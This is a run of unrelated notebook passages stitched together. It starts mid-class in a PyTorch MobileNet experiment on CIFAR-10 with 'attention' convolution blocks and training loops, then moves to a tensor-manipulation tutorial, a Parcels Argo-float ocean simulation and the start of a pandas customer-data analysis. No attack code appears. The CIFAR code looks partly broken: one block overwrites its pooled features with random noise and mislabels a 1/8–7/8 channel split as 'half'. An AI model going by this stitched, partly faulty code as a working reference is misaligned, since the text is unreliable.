self.conv1D= nn.Conv1d(1, out_planes, one_conv_kernel_size, stride=1,padding=1,groups=1,dilation=1,bias=False) # initialized in __init__
self.bn2 = nn.BatchNorm2d(out_planes)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
# -------------------------- Attention -----------------------
w = F.avg_pool2d(x,x.shape[-1]) # better to define this in __init__
#print(w.shape)
# [bs,in_Channel,1,1]
w = w.view(w.shape[0],1,w.shape[1])
# [bs,1,in_Channel]
# one_conv_filter = nn.Conv1d(1, out_channel, one_conv_kernel_size, stride=1,padding=1,groups=1,dilation=1) # initialized in __init__
# [bs,out_channel,in_Channel]
w = self.conv1D(w)
w = 0.5*F.tanh(w) # [-0.5,+0.5]
# -------------- softmax ---------------------------
#print(w.shape)
w = w.view(w.shape[0],w.shape[1],w.shape[2],1,1)
#print(w.shape)
# ------------------------- fusion --------------------------
out=out.view(out.shape[0],1,out.shape[1],out.shape[2],out.shape[3])
#print("x size:",out.shape)
out=out*w
#print("after fusion x size:",out.shape)
out=out.sum(dim=2)
out = F.relu(self.bn2(out))
return out
class MobileNet(nn.Module):
# (128,2) means conv planes=128, conv stride=2, by default conv stride=1
cfg = [64, (128,2), 128, (256,2), 256, (512,2), 512, 512, 512, 512, 512, (1024,2), 1024]
def __init__(self, num_classes=10):
super(MobileNet, self).__init__()
self.conv1 = nn.Conv2d(3, 32, kernel_size=3, stride=1, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(32)
self.layers = self._make_layers(in_planes=32) # build the layers automatically
self.linear = nn.Linear(1024, num_classes)
def _make_layers(self, in_planes):
layers = []
for x in self.cfg:
out_planes = x if isinstance(x, int) else x[0]
stride = 1 if isinstance(x, int) else x[1]
layers.append(Block(in_planes, out_planes, stride))
in_planes = out_planes
return nn.Sequential(*layers)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.layers(out)
out = F.avg_pool2d(out, 2)
out = out.view(out.size(0), -1)
out = self.linear(out)
return out
```
```
# 32x32 input is downscaled 5 times to 1x1@1024
# From https://github.com/kuangliu/pytorch-cifar
import torch
import torch.nn as nn
import torch.nn.functional as F
class Block_Attention_HALF(nn.Module):
'''Depthwise conv + Pointwise conv'''
def __init__(self, in_planes, out_planes, stride=1):
super(Block_Attention_HALF, self).__init__()
# depthwise conv: number of groups = number of input channels
self.conv1 = nn.Conv2d(in_planes, in_planes, kernel_size=3, stride=stride, padding=1, groups=in_planes, bias=False)
self.bn1 = nn.BatchNorm2d(in_planes)
#------------------------ one half: regular 1x1 conv ------------------------
self.conv2 = nn.Conv2d(in_planes, int(out_planes*0.125), kernel_size=1, stride=1, padding=0, bias=False)
#------------------------ the other half: attention-generated 1x1 conv ------
one_conv_kernel_size = 17 # [3,7,9]
self.conv1D= nn.Conv1d(1, int(out_planes*0.875), one_conv_kernel_size, stride=1,padding=8,groups=1,dilation=1,bias=False) # initialized in __init__
#------------------------------------------------------------
self.bn2 = nn.BatchNorm2d(out_planes)
def forward(self, x):
out = F.relu6(self.bn1(self.conv1(x)))
# -------------------------- Attention -----------------------
w = F.avg_pool2d(x,x.shape[-1]) # better to define this in __init__
#print(w.shape)
# [bs,in_Channel,1,1]
in_channel=w.shape[1]
#w = w.view(w.shape[0],1,w.shape[1])
# [bs,1,in_Channel]
# average over this batch, keeping dim 0
#w= w.mean(dim=0,keepdim=True)
# MAX=w.shape[0]
# NUM=torch.floor(MAX*torch.rand(1)).long()
# if NUM>=0 and NUM<MAX:
# w=w[NUM]
# else:
# w=w[0]
# w=w[0]
w=torch.randn(w[0].shape).cuda()*0.1
a=torch.randn(1).cuda()*0.1
if a>0.39:
print(w.shape)
print(w)
w=w.view(1,1,in_channel)
# [bs=1,1,in_Channel]
# one_conv_filter = nn.Conv1d(1, out_channel, one_conv_kernel_size, stride=1,padding=1,groups=1,dilation=1) # initialized in __init__
# [bs=1,out_channel//2,in_Channel]
w = self.conv1D(w)
# [bs=1,out_channel//2,in_Channel]
#-------------------------------------
w = 0.5*F.tanh(w) # [-0.5,+0.5]
if a>0.39:
print(w.shape)
print(w)
# [bs=1,out_channel//2,in_Channel]
w=w.view(w.shape[1],w.shape[2],1,1)
# [out_channel//2,in_Channel,1,1]
# -------------- softmax ---------------------------
#print(w.shape)
# ------------------------- fusion --------------------------
# conv 1x1
out_1=self.conv2(out)
out_2=F.conv2d(out,w,bias=None,stride=1,groups=1,dilation=1)
out=torch.cat([out_1,out_2],1)
# ----------------------- try without relu -------------------------------
out = F.relu6(self.bn2(out))
return out
class Block_Attention(nn.Module):
'''Depthwise conv + Pointwise conv'''
def __init__(self, in_planes, out_planes, stride=1):
super(Block_Attention, self).__init__()
# depthwise conv: number of groups = number of input channels
self.conv1 = nn.Conv2d(in_planes, in_planes, kernel_size=3, stride=stride, padding=1, groups=in_planes, bias=False)
self.bn1 = nn.BatchNorm2d(in_planes)
#self.conv2 = nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=1, padding=0, bias=False)
one_conv_kernel_size = 17 # [3,7,9]
self.conv1D= nn.Conv1d(1, out_planes, one_conv_kernel_size, stride=1,padding=8,groups=1,dilation=1,bias=False) # initialized in __init__
self.bn2 = nn.BatchNorm2d(out_planes)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
# -------------------------- Attention -----------------------
w = F.avg_pool2d(x,x.shape[-1]) # better to define this in __init__
#print(w.shape)
# [bs,in_Channel,1,1]
in_channel=w.shape[1]
#w = w.view(w.shape[0],1,w.shape[1])
# [bs,1,in_Channel]
# average over this batch, keeping dim 0
#w= w.mean(dim=0,keepdim=True)
# MAX=w.shape[0]
# NUM=torch.floor(MAX*torch.rand(1)).long()
# if NUM>=0 and NUM<MAX:
# w=w[NUM]
# else:
# w=w[0]
w=w[0]
w=w.view(1,1,in_channel)
# [bs=1,1,in_Channel]
# one_conv_filter = nn.Conv1d(1, out_channel, one_conv_kernel_size, stride=1,padding=1,groups=1,dilation=1) # initialized in __init__
# [bs=1,out_channel,in_Channel]
w = self.conv1D(w)
# [bs=1,out_channel,in_Channel]
w = 0.5*F.tanh(w) # [-0.5,+0.5]
# [bs=1,out_channel,in_Channel]
w=w.view(w.shape[1],w.shape[2],1,1)
# [out_channel,in_Channel,1,1]
# -------------- softmax ---------------------------
#print(w.shape)
# ------------------------- fusion --------------------------
# conv 1x1
out=F.conv2d(out,w,bias=None,stride=1,groups=1,dilation=1)
out = F.relu(self.bn2(out))
return out
class Block(nn.Module):
'''Depthwise conv + Pointwise conv'''
def __init__(self, in_planes, out_planes, stride=1):
super(Block, self).__init__()
# depthwise conv: number of groups = number of input channels
self.conv1 = nn.Conv2d(in_planes, in_planes, kernel_size=3, stride=stride, padding=1, groups=in_planes, bias=False)
self.bn1 = nn.BatchNorm2d(in_planes)
self.conv2 = nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=1, padding=0, bias=False)
self.bn2 = nn.BatchNorm2d(out_planes)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = F.relu(self.bn2(self.conv2(out)))
return out
class MobileNet(nn.Module):
# (128,2) means conv planes=128, conv stride=2, by default conv stride=1
#cfg = [64, (128,2), 128, (256,2), 256, (512,2), 512, 512, 512, 512, 512, (1024,2), 1024]
#cfg = [64, (128,2), 128, (256,2), 256, (512,2), 512, 512, 512, 512, 512, (1024,2), [1024,1]]
cfg = [64, (128,2), 128, 256, 256, (512,2), [512,1], [512,1], [512,1],[512,1], [512,1], [1024,1], [1024,1]]
def __init__(self, num_classes=10):
super(MobileNet, self).__init__()
self.conv1 = nn.Conv2d(3, 32, kernel_size=3, stride=1, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(32)
self.layers = self._make_layers(in_planes=32) # build the layers automatically
self.linear = nn.Linear(1024, num_classes)
def _make_layers(self, in_planes):
layers = []
for x in self.cfg:
if isinstance(x, int):
out_planes = x
stride = 1
layers.append(Block(in_planes, out_planes, stride))
elif isinstance(x, tuple):
out_planes = x[0]
stride = x[1]
layers.append(Block(in_planes, out_planes, stride))
# attention-conv (AC) layers are specified via list entries
elif isinstance(x, list):
out_planes= x[0]
stride = x[1] if len(x)==2 else 1
layers.append(Block_Attention_HALF(in_planes, out_planes, stride))
else:
pass
in_planes = out_planes
return nn.Sequential(*layers)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.layers(out)
out = F.avg_pool2d(out, 8)
out = out.view(out.size(0), -1)
out = self.linear(out)
return out
# From https://github.com/Z0m6ie/CIFAR-10_PyTorch
#model = mobilenet(num_classes=10, large_img=False)
# From https://github.com/kuangliu/pytorch-cifar
if torch.cuda.is_available():
model=MobileNet(10).cuda()
else:
model=MobileNet(10)
optimizer = optim.SGD(model.parameters(), lr=0.1, momentum=0.9, weight_decay=5e-4)
#scheduler = StepLR(optimizer, step_size=70, gamma=0.1)
scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones=[50,70,75,80], gamma=0.1)
criterion = nn.CrossEntropyLoss()
# Implement validation
def train(epoch):
model.train()
#writer = SummaryWriter()
for batch_idx, (data, target) in enumerate(train_loader):
if use_cuda:
data, target = data.cuda(), target.cuda()
data, target = Variable(data), Variable(target)
optimizer.zero_grad()
output = model(data)
correct = 0
pred = output.data.max(1, keepdim=True)[1] # get the index of the max log-probability
correct += pred.eq(target.data.view_as(pred)).sum()
loss = criterion(output, target)
loss.backward()
accuracy = 100. * (correct.cpu().numpy()/ len(output))
optimizer.step()
if batch_idx % (5 * show_step) == 0:
# if batch_idx % 2*show_step == 0:
# print(model.layers[1].conv1D.weight.shape)
# print(model.layers[1].conv1D.weight[0:2][0:2])
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}, Accuracy: {:.2f}'.format(
epoch, batch_idx * len(data), len(train_loader.dataset),
100. * batch_idx / len(train_loader), loss.item(), accuracy))
# f1=open("Cifar10_INFO.txt","a+")
# f1.write("\n"+'Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}, Accuracy: {:.2f}'.format(
# epoch, batch_idx * len(data), len(train_loader.dataset),
# 100. * batch_idx / len(train_loader), loss.item(), accuracy))
# f1.close()
#writer.add_scalar('Loss/Loss', loss.item(), epoch)
#writer.add_scalar('Accuracy/Accuracy', accuracy, epoch)
scheduler.step()
def validate(epoch):
model.eval()
#writer = SummaryWriter()
valid_loss = 0
correct = 0
for data, target in valid_loader:
if use_cuda:
data, target = data.cuda(), target.cuda()
data, target = Variable(data), Variable(target)
output = model(data)
valid_loss += F.cross_entropy(output, target, size_average=False).item() # sum up batch loss
pred = output.data.max(1, keepdim=True)[1] # get the index of the max log-probability
correct += pred.eq(target.data.view_as(pred)).sum()
valid_loss /= len(valid_idx)
accuracy = 100. * correct.cpu().numpy() / len(valid_idx)
print('\nValidation set: Average loss: {:.4f}, Accuracy: {}/{} ({:.2f}%)\n'.format(
valid_loss, correct, len(valid_idx),
100. * correct / len(valid_idx)))
# f1=open("Cifar10_INFO.txt","a+")
# f1.write('\nValidation set: Average loss: {:.4f}, Accuracy: {}/{} ({:.2f}%)\n'.format(
# valid_loss, correct, len(valid_idx),
# 100. * correct / len(valid_idx)))
# f1.close()
#writer.add_scalar('Loss/Validation_Loss', valid_loss, epoch)
#writer.add_scalar('Accuracy/Validation_Accuracy', accuracy, epoch)
return valid_loss, accuracy
# Fix best model
def test(epoch):
model.eval()
test_loss = 0
correct = 0
for data, target in test_loader:
if use_cuda:
data, target = data.cuda(), target.cuda()
data, target = Variable(data), Variable(target)
output = model(data)
        test_loss += F.cross_entropy(output, target, reduction='sum').item() # sum up batch loss
pred = output.data.max(1, keepdim=True)[1] # get the index of the max log-probability
correct += pred.eq(target.data.view_as(pred)).cpu().sum()
test_loss /= len(test_loader.dataset)
print('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.2f}%)\n'.format(
test_loss, correct, len(test_loader.dataset),
100. * correct.cpu().numpy() / len(test_loader.dataset)))
# f1=open("Cifar10_INFO.txt","a+")
# f1.write('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.2f}%)\n'.format(
# test_loss, correct, len(test_loader.dataset),
# 100. * correct.cpu().numpy() / len(test_loader.dataset)))
# f1.close()
def save_best(loss, accuracy, best_loss, best_acc):
    if best_loss is None:
best_loss = loss
best_acc = accuracy
file = 'saved_models/best_save_model.p'
torch.save(model.state_dict(), file)
elif loss < best_loss and accuracy > best_acc:
best_loss = loss
best_acc = accuracy
file = 'saved_models/best_save_model.p'
torch.save(model.state_dict(), file)
return best_loss, best_acc
# Fantastic logger for tensorboard and pytorch,
# run tensorboard by opening a new terminal and run "tensorboard --logdir runs"
# open tensorboard at http://localhost:6006/
from tensorboardX import SummaryWriter
best_loss = None
best_acc = None
import time
SINCE=time.time()
for epoch in range(max_epoch):
train(epoch)
loss, accuracy = validate(epoch)
best_loss, best_acc = save_best(loss, accuracy, best_loss, best_acc)
NOW=time.time()
DURINGS=NOW-SINCE
SINCE=NOW
print("the time of this epoch:[{} s]".format(DURINGS))
if epoch>=10 and (epoch-10)%2==0:
test(epoch)
# writer = SummaryWriter()
# writer.export_scalars_to_json("./all_scalars.json")
# writer.close()
#---------------------------- Test ------------------------------
test(epoch)
```
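A note on the logging interval check in `train()`: in Python, `%` binds more tightly than `*`, so an unparenthesized `batch_idx % 5*show_step` would evaluate as `(batch_idx % 5) * show_step` rather than an every-`5*show_step`-batches test. A standalone illustration (plain Python, using made-up values for the two names):

```python
batch_idx, show_step = 20, 10

# Without parentheses, % is applied first: (20 % 5) * 10 == 0.
unparenthesized = batch_idx % 5 * show_step == 0
print(unparenthesized)  # True, but only because 20 % 5 == 0

# The intended "every 5*show_step batches" test needs parentheses:
intended = batch_idx % (5 * show_step) == 0
print(intended)  # False: 20 % 50 == 20
```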
# Step 3: Test
```
test(epoch)
```
## First run: scale in [0, 1]
```
# Inspect information from the training process
import matplotlib.pyplot as plt
def parse(in_file,flag):
num=-1
ys=list()
xs=list()
losses=list()
with open(in_file,"r") as reader:
for aLine in reader:
#print(aLine)
res=[e for e in aLine.strip('\n').split(" ")]
if res[0]=="Train" and flag=="Train":
num=num+1
ys.append(float(res[-1]))
xs.append(int(num))
losses.append(float(res[-3].split(',')[0]))
if res[0]=="Validation" and flag=="Validation":
num=num+1
xs.append(int(num))
tmp=[float(e) for e in res[-2].split('/')]
ys.append(100*float(tmp[0]/tmp[1]))
losses.append(float(res[-4].split(',')[0]))
plt.figure(1)
plt.plot(xs,ys,'ro')
plt.figure(2)
plt.plot(xs, losses, 'ro')
plt.show()
def main():
    in_file="D://INFO.txt"
    # Show accuracy and loss information for the training phase
    parse(in_file,"Train") # "Validation"
    # Show accuracy and loss information for the validation phase
    #parse(in_file,"Validation") # "Validation"
if __name__=="__main__":
main()
# Inspect information from the training process
import matplotlib.pyplot as plt
def parse(in_file,flag):
num=-1
ys=list()
xs=list()
losses=list()
with open(in_file,"r") as reader:
for aLine in reader:
#print(aLine)
res=[e for e in aLine.strip('\n').split(" ")]
if res[0]=="Train" and flag=="Train":
num=num+1
ys.append(float(res[-1]))
xs.append(int(num))
losses.append(float(res[-3].split(',')[0]))
if res[0]=="Validation" and flag=="Validation":
num=num+1
xs.append(int(num))
tmp=[float(e) for e in res[-2].split('/')]
ys.append(100*float(tmp[0]/tmp[1]))
losses.append(float(res[-4].split(',')[0]))
plt.figure(1)
plt.plot(xs,ys,'r-')
plt.figure(2)
plt.plot(xs, losses, 'r-')
plt.show()
def main():
    in_file="D://INFO.txt"
    # Show accuracy and loss information for the training phase
    parse(in_file,"Train") # "Validation"
    # Show accuracy and loss information for the validation phase
    parse(in_file,"Validation") # "Validation"
if __name__=="__main__":
main()
```
# Lab 1: Tensor Manipulation
First Author: Seungjae Ryan Lee (seungjaeryanlee at gmail dot com)
Second Author: Ki Hyun Kim (nlp.with.deep.learning at gmail dot com)
<div class="alert alert-warning">
NOTE: This corresponds to <a href="https://www.youtube.com/watch?v=ZYX0FaqUeN4&t=23s&list=PLlMkM4tgfjnLSOjrEJN31gZATbcj_MpUm&index=25">Lab 8 of Deep Learning Zero to All Season 1 for TensorFlow</a>.
</div>
## Imports
Run `pip install -r requirements.txt` in terminal to install all required Python packages.
```
import numpy as np
import torch
```
## NumPy Review
We hope that you are familiar with `numpy` and basic linear algebra.
### 1D Array with NumPy
```
t = np.array([0., 1., 2., 3., 4., 5., 6.])
print(t)
print('Rank of t: ', t.ndim)
print('Shape of t: ', t.shape)
print('t[0] t[1] t[-1] = ', t[0], t[1], t[-1]) # Element
print('t[2:5] t[4:-1] = ', t[2:5], t[4:-1]) # Slicing
print('t[:2] t[3:] = ', t[:2], t[3:]) # Slicing
```
### 2D Array with NumPy
```
t = np.array([[1., 2., 3.], [4., 5., 6.], [7., 8., 9.], [10., 11., 12.]])
print(t)
print('Rank of t: ', t.ndim)
print('Shape of t: ', t.shape)
```
## PyTorch is like NumPy (but better)
### 1D Array with PyTorch
```
t = torch.FloatTensor([0., 1., 2., 3., 4., 5., 6.])
print(t)
print(t.dim()) # rank
print(t.shape) # shape
print(t.size()) # shape
print(t[0], t[1], t[-1]) # Element
print(t[2:5], t[4:-1]) # Slicing
print(t[:2], t[3:]) # Slicing
```
### 2D Array with PyTorch
```
t = torch.FloatTensor([[1., 2., 3.],
[4., 5., 6.],
[7., 8., 9.],
[10., 11., 12.]
])
print(t)
print(t.dim()) # rank
print(t.size()) # shape
print(t[:, 1])
print(t[:, 1].size())
print(t[:, :-1])
```
### Shape, Rank, Axis
```
t = torch.FloatTensor([[[[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]],
[[13, 14, 15, 16],
[17, 18, 19, 20],
[21, 22, 23, 24]]
]])
print(t.dim()) # rank = 4
print(t.size()) # shape = (1, 2, 3, 4)
```
## Frequently Used Operations in PyTorch
### Mul vs. Matmul
```
print()
print('-------------')
print('Mul vs Matmul')
print('-------------')
m1 = torch.FloatTensor([[1, 2], [3, 4]])
m2 = torch.FloatTensor([[1], [2]])
print('Shape of Matrix 1: ', m1.shape) # 2 x 2
print('Shape of Matrix 2: ', m2.shape) # 2 x 1
print(m1.matmul(m2)) # 2 x 1
m1 = torch.FloatTensor([[1, 2], [3, 4]])
m2 = torch.FloatTensor([[1], [2]])
print('Shape of Matrix 1: ', m1.shape) # 2 x 2
print('Shape of Matrix 2: ', m2.shape) # 2 x 1
print(m1 * m2) # 2 x 2
print(m1.mul(m2))
```
### Broadcasting
<div class="alert alert-warning">
Careless use of broadcasting can lead to code that is hard to debug.
</div>
```
# Same shape
m1 = torch.FloatTensor([[3, 3]])
m2 = torch.FloatTensor([[2, 2]])
print(m1 + m2)
# Vector + scalar
m1 = torch.FloatTensor([[1, 2]])
m2 = torch.FloatTensor([3]) # 3 -> [[3, 3]]
print(m1 + m2)
# 2 x 1 Vector + 1 x 2 Vector
m1 = torch.FloatTensor([[1, 2]])
m2 = torch.FloatTensor([[3], [4]])
print(m1 + m2)
```
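The automatic expansion in the last example is exactly what the warning above is about: a stray extra axis silently changes the result shape instead of raising an error. A NumPy sketch of the same pitfall (NumPy and PyTorch follow the same broadcasting rules):

```python
import numpy as np

a = np.array([1., 2., 3.])        # shape (3,)
b = np.array([[1.], [2.], [3.]])  # shape (3, 1) -- an accidental column vector

# Intended: elementwise sum of two length-3 vectors.
# Actual: broadcasting expands both operands to shape (3, 3).
result = a + b
print(result.shape)  # (3, 3)
```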
### Mean
```
t = torch.FloatTensor([1, 2])
print(t.mean())
# Can't use mean() on integers
t = torch.LongTensor([1, 2])
try:
print(t.mean())
except Exception as exc:
print(exc)
```
You can also use `t.mean` on higher-rank tensors to get the mean of all elements, or the mean along a particular dimension.
```
t = torch.FloatTensor([[1, 2], [3, 4]])
print(t)
print(t.mean())
print(t.mean(dim=0))
print(t.mean(dim=1))
print(t.mean(dim=-1))
```
### Sum
```
t = torch.FloatTensor([[1, 2], [3, 4]])
print(t)
print(t.sum())
print(t.sum(dim=0))
print(t.sum(dim=1))
print(t.sum(dim=-1))
```
### Max and Argmax
```
t = torch.FloatTensor([[1, 2], [3, 4]])
print(t)
```
The `max` operator returns one value if it is called without an argument.
```
print(t.max()) # Returns one value: max
```
The `max` operator returns 2 values when called with dimension specified. The first value is the maximum value, and the second value is the argmax: the index of the element with maximum value.
```
print(t.max(dim=0)) # Returns two values: max and argmax
print('Max: ', t.max(dim=0)[0])
print('Argmax: ', t.max(dim=0)[1])
print(t.max(dim=1))
print(t.max(dim=-1))
```
### View
<div class="alert alert-warning">
This function is hard to master, but it is very useful!
</div>
```
t = np.array([[[0, 1, 2],
[3, 4, 5]],
[[6, 7, 8],
[9, 10, 11]]])
ft = torch.FloatTensor(t)
print(ft.shape)
print(ft.view([-1, 3]))
print(ft.view([-1, 3]).shape)
print(ft.view([-1, 1, 3]))
print(ft.view([-1, 1, 3]).shape)
```
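The `-1` in `view` means "infer this dimension from the element count", the same convention as NumPy's `reshape`. A quick NumPy check of the inference:

```python
import numpy as np

t = np.arange(12).reshape(2, 2, 3)

# -1 is inferred as 12 elements / 3 columns = 4 rows,
# mirroring ft.view([-1, 3]) above.
flat = t.reshape(-1, 3)
print(flat.shape)  # (4, 3)
```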
### Squeeze
```
ft = torch.FloatTensor([[0], [1], [2]])
print(ft)
print(ft.shape)
print(ft.squeeze())
print(ft.squeeze().shape)
```
### Unsqueeze
```
ft = torch.Tensor([0, 1, 2])
print(ft.shape)
print(ft.unsqueeze(0))
print(ft.unsqueeze(0).shape)
print(ft.view(1, -1))
print(ft.view(1, -1).shape)
print(ft.unsqueeze(1))
print(ft.unsqueeze(1).shape)
print(ft.unsqueeze(-1))
print(ft.unsqueeze(-1).shape)
```
### Scatter (for one-hot encoding)
<div class="alert alert-warning">
Scatter is a very flexible function. We only discuss how to use it to get a one-hot encoding of indices.
</div>
```
lt = torch.LongTensor([[0], [1], [2], [0]])
print(lt)
one_hot = torch.zeros(4, 3) # batch_size = 4, classes = 3
one_hot.scatter_(1, lt, 1)
print(one_hot)
```
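As a cross-check on the result, the same one-hot encoding can be produced in NumPy by row-selecting from an identity matrix (an illustration only, not part of the lab):

```python
import numpy as np

idx = np.array([0, 1, 2, 0])  # mirrors the LongTensor above
num_classes = 3

# Selecting rows of the identity matrix yields one-hot vectors,
# the NumPy counterpart of the scatter_-based encoding.
one_hot = np.eye(num_classes)[idx]
print(one_hot)
```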
### Casting
```
lt = torch.LongTensor([1, 2, 3, 4])
print(lt)
print(lt.float())
bt = torch.ByteTensor([True, False, False, True])
print(bt)
print(bt.long())
print(bt.float())
```
### Concatenation
```
x = torch.FloatTensor([[1, 2], [3, 4]])
y = torch.FloatTensor([[5, 6], [7, 8]])
print(torch.cat([x, y], dim=0))
print(torch.cat([x, y], dim=1))
```
### Stacking
```
x = torch.FloatTensor([1, 4])
y = torch.FloatTensor([2, 5])
z = torch.FloatTensor([3, 6])
print(torch.stack([x, y, z]))
print(torch.stack([x, y, z], dim=1))
print(torch.cat([x.unsqueeze(0), y.unsqueeze(0), z.unsqueeze(0)], dim=0))
```
### Ones and Zeros Like
```
x = torch.FloatTensor([[0, 1, 2], [2, 1, 0]])
print(x)
print(torch.ones_like(x))
print(torch.zeros_like(x))
```
### In-place Operation
```
x = torch.FloatTensor([[1, 2], [3, 4]])
print(x.mul(2.))
print(x)
print(x.mul_(2.))
print(x)
```
## Miscellaneous
### Zip
```
for x, y in zip([1, 2, 3], [4, 5, 6]):
print(x, y)
for x, y, z in zip([1, 2, 3], [4, 5, 6], [7, 8, 9]):
print(x, y, z)
```
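A side note not covered above: `zip` stops at the shortest input, while `itertools.zip_longest` pads the shorter one instead:

```python
from itertools import zip_longest

# zip truncates to the shorter iterable...
print(list(zip([1, 2, 3], [4, 5])))
# ...while zip_longest pads the missing slots with fillvalue.
print(list(zip_longest([1, 2, 3], [4, 5], fillvalue=0)))
```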
## Tutorial on how to simulate an Argo float in Parcels
This tutorial shows how simple it is to construct a Kernel in Parcels that mimics the [vertical movement of Argo floats](http://www.argo.ucsd.edu/operation_park_profile.jpg).
```
# Define the new Kernel that mimics Argo vertical movement
def ArgoVerticalMovement(particle, fieldset, time):
    driftdepth = 1000  # drift depth in m
maxdepth = 2000 # maximum depth in m
vertical_speed = 0.10 # sink and rise speed in m/s
cycletime = 10 * 86400 # total time of cycle in seconds
drifttime = 9 * 86400 # time of deep drift in seconds
if particle.cycle_phase == 0:
# Phase 0: Sinking with vertical_speed until depth is driftdepth
particle.depth += vertical_speed * particle.dt
if particle.depth >= driftdepth:
particle.cycle_phase = 1
elif particle.cycle_phase == 1:
# Phase 1: Drifting at depth for drifttime seconds
particle.drift_age += particle.dt
if particle.drift_age >= drifttime:
particle.drift_age = 0 # reset drift_age for next cycle
particle.cycle_phase = 2
elif particle.cycle_phase == 2:
# Phase 2: Sinking further to maxdepth
particle.depth += vertical_speed * particle.dt
if particle.depth >= maxdepth:
particle.cycle_phase = 3
elif particle.cycle_phase == 3:
# Phase 3: Rising with vertical_speed until at surface
particle.depth -= vertical_speed * particle.dt
#particle.temp = fieldset.temp[time, particle.depth, particle.lat, particle.lon] # if fieldset has temperature
if particle.depth <= fieldset.mindepth:
particle.depth = fieldset.mindepth
#particle.temp = 0./0. # reset temperature to NaN at end of sampling cycle
particle.cycle_phase = 4
elif particle.cycle_phase == 4:
# Phase 4: Transmitting at surface until cycletime is reached
if particle.cycle_age > cycletime:
particle.cycle_phase = 0
particle.cycle_age = 0
particle.cycle_age += particle.dt # update cycle_age
```
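The kernel above is a five-phase state machine driven only by the depth, two age counters, and `dt`. It can be exercised outside Parcels with a tiny pure-Python mock using the same constants (all names below are local stand-ins for illustration, not Parcels API):

```python
# Pure-Python mock of the Argo cycle phases, with the same constants
# as the kernel above (metres and seconds).
driftdepth, maxdepth, v = 1000, 2000, 0.10
drifttime, cycletime = 9 * 86400, 10 * 86400
dt = 600  # 10-minute timestep

depth, phase = 0.0, 0
drift_age, cycle_age = 0.0, 0.0
phases_seen = set()

for _ in range(20000):
    phases_seen.add(phase)
    if phase == 0:        # initial descent
        depth += v * dt
        if depth >= driftdepth:
            phase = 1
    elif phase == 1:      # park / drift at depth
        drift_age += dt
        if drift_age >= drifttime:
            drift_age, phase = 0.0, 2
    elif phase == 2:      # profile descent
        depth += v * dt
        if depth >= maxdepth:
            phase = 3
    elif phase == 3:      # ascent to the surface
        depth -= v * dt
        if depth <= 0:
            depth, phase = 0.0, 4
    elif phase == 4:      # transmit at surface until cycletime
        if cycle_age > cycletime:
            phase, cycle_age = 0, 0.0
    cycle_age += dt

print(sorted(phases_seen))  # [0, 1, 2, 3, 4]
```

Over 20000 ten-minute steps the float completes several full cycles, so every phase is visited.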
And then we can run Parcels with this 'custom kernel'.
Note that below we use the two-dimensional velocity fields of GlobCurrent, as these are provided as example_data with Parcels.
We therefore assume that the horizontal velocities are the same throughout the entire water column. However, the `ArgoVerticalMovement` kernel will work on any `FieldSet`, including one built from full three-dimensional hydrodynamic data.
If the hydrodynamic data also has a Temperature Field, then uncommenting the lines about temperature will also simulate the sampling of temperature.
```
from parcels import FieldSet, ParticleSet, JITParticle, AdvectionRK4, ErrorCode, Variable
from datetime import timedelta
import numpy as np
# Load the GlobCurrent data in the Agulhas region from the example_data
filenames = {'U': "GlobCurrent_example_data/20*.nc",
'V': "GlobCurrent_example_data/20*.nc"}
variables = {'U': 'eastward_eulerian_current_velocity',
'V': 'northward_eulerian_current_velocity'}
dimensions = {'lat': 'lat', 'lon': 'lon', 'time': 'time'}
fieldset = FieldSet.from_netcdf(filenames, variables, dimensions)
fieldset.mindepth = fieldset.U.depth[0] # uppermost layer in the hydrodynamic data
# Define a new Particle type including extra Variables
class ArgoParticle(JITParticle):
# Phase of cycle: init_descend=0, drift=1, profile_descend=2, profile_ascend=3, transmit=4
    cycle_phase = Variable('cycle_phase', dtype=np.int32, initial=0)
cycle_age = Variable('cycle_age', dtype=np.float32, initial=0.)
drift_age = Variable('drift_age', dtype=np.float32, initial=0.)
#temp = Variable('temp', dtype=np.float32, initial=np.nan) # if fieldset has temperature
# Initiate one Argo float in the Agulhas Current
pset = ParticleSet(fieldset=fieldset, pclass=ArgoParticle, lon=[32], lat=[-31], depth=[0])
# combine Argo vertical movement kernel with built-in Advection kernel
kernels = ArgoVerticalMovement + pset.Kernel(AdvectionRK4)
# Now execute the kernels for 30 days, saving data every 30 minutes
pset.execute(kernels, runtime=timedelta(days=30), dt=timedelta(minutes=5),
output_file=pset.ParticleFile(name="argo_float", outputdt=timedelta(minutes=30)))
```
Now we can plot the trajectory of the Argo float with some simple calls to netCDF4 and matplotlib.
```
%matplotlib inline
import netCDF4
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
nc = netCDF4.Dataset("argo_float.nc")
x = nc.variables["lon"][:].squeeze()
y = nc.variables["lat"][:].squeeze()
z = nc.variables["z"][:].squeeze()
nc.close()
fig = plt.figure(figsize=(13,10))
ax = plt.axes(projection='3d')
cb = ax.scatter(x, y, z, c=z, s=20, marker="o")
ax.set_xlabel("Longitude")
ax.set_ylabel("Latitude")
ax.set_zlabel("Depth (m)")
ax.set_zlim(np.max(z),0)
plt.show()
```
# Analyzing and Understanding Customer Behavior
* use_log.csv : center usage history (April 2018 – March 2019)
* customer_master.csv : member data as of the end of March 2019 (including previously withdrawn members)
* class_master.csv : membership classes (all-day, daytime, evening)
* campaign_master.csv : campaign classes (with or without enrollment fee)
## 1. Checking the Data
```
import pandas as pd
uselog = pd.read_csv('use_log.csv')
print(len(uselog))
uselog.head()
customer = pd.read_csv('customer_master.csv')
print(len(customer))
customer.head()
class_master = pd.read_csv('class_master.csv')
print(len(class_master))
class_master.head()
campaign_master = pd.read_csv('campaign_master.csv')
print(len(campaign_master))
campaign_master.head()
```
